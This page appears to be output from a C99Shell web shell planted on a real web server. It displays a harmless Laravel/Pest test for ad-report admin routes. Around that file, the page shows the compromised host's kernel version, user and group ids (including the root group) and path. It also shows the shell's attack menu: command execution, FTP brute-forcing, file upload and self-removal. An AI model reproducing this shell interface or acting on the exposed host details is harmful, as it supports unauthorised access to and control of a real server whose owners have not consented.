!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/tests/Feature/Admin/   drwxr-xr-x
Free 28.18 GB of 117.98 GB (23.88%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     AdReportControllerTest.php (1.56 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Tests\Admin\Feature;

use 
App\Models\AdReportCategory;
use 
App\Models\ReportAd;
use 
App\Models\User;
use 
Illuminate\Foundation\Testing\RefreshDatabase;

uses(RefreshDatabase::class);

beforeEach(function () {
    
$this->admin createAdmin();
    
$this->actingAs($this->admin'admin');
});

test('admin can visit the ad report index', function () {
    
// Create a user and a report
    
$user User::factory()->create();

    
// Send the get request
    
$response $this->get(route('report-ad'));

    
// Assert it was successful
    
$response->assertStatus(200);

    
// Assert the correct view was returned
    // $response->assertViewIs('admin.ad-report.index');
    
$response->assertSee('Listing Report List');
});

test('admin can delete an ad report', function () {
    
// Create related models
    
$reportFrom User::factory()->create();
    
$reportTo User::factory()->create();

    
// Create a report category
    
$reportCategory AdReportCategory::create([
        
'name' => 'Test Category',
    ]);

    
// Create a report
    
$report ReportAd::create([
        
'report_from_id' => $reportFrom->id,
        
'report_to_id' => $reportTo->id,
        
'ad_report_category_id' => $reportCategory->id,
        
'report_description' => 'Test report description',
    ]);

    
// Send the delete request
    
$response $this->delete(route('report-ad.destroy'$report->id));

    
// Assert it was successful
    
$response->assertStatus(302);

    
// Assert the report was deleted from the database
    
$this->assertDatabaseMissing('report_ads', ['id' => $report->id]);
});

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0031 ]--